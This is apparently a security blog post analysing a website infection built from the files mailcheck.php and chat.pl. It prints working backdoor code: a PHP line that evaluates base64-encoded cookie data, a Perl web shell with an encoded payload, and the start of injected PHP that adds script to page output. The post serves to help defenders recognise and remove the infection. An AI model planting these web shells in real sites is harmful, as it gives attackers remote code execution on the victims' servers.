This attack isn’t anything new, it was used on a number of Italian sites in March 2010, but we’ve been seeing more of it infecting websites recently so I thought I’d elaborate.

Quite often when scanning or cleaning infected websites, when we see the mailcheck.php file, we also see the chat.pl file but that isn’t cast in stone. However, we have not seen chat.pl by itself. In other words, mailcheck.php can appear by itself, but chat.pl does not – at least from what we’ve seen.

The mailcheck.php files usually contains this code:

Which deobfuscates to:

if(isset($COOKIE[“PHPSESSIID”])){eval(base64_decode($COOKIE[“PHPSESSIID”]));exit;}

The chat.pl file is programmed in Perl and looks like:

#!/usr/bin/perl use MIME::Base64 ();eval MIME::Base64::decode("JGMgPSAkRU5WeyJIVFRQX0NPT0tJRSJ9O0BjID0gc3BsaXQgLzsvLCAkYztmb3JlYWNoICRhIChA\nYyl7JGEgPX4gbS9QSFBTRVNTSUlEPSguKikvO2lmIChsZW5ndGgoJDEpID4gMCkge2V2YWwgTUlN\nRTo6QmFzZTY0OjpkZWNvZGUoJDEpO2RpZSAiIjt9fQ=="); $P = "Lf'njItkk"; $WinNT = 0; $NTCmdSep = "&"; $UnixCmdSep = ";"; $CommandTimeoutDuration = 120; $ShowDynamicOutput = 1;

As you can see, this code also uses the base64 decoding even though in it’s written in Perl. Same strategy, different programming language.

With the infection of mailcheck.php and/or chat.pl, we’ve seen a number of .php and sometimes even .html files that have some PHP code inserted across the top of the file that looks like:

<?php ob_start(‘security_update’); function security_update($buffer){return $buffer.’<script language=”javascript”>function t()…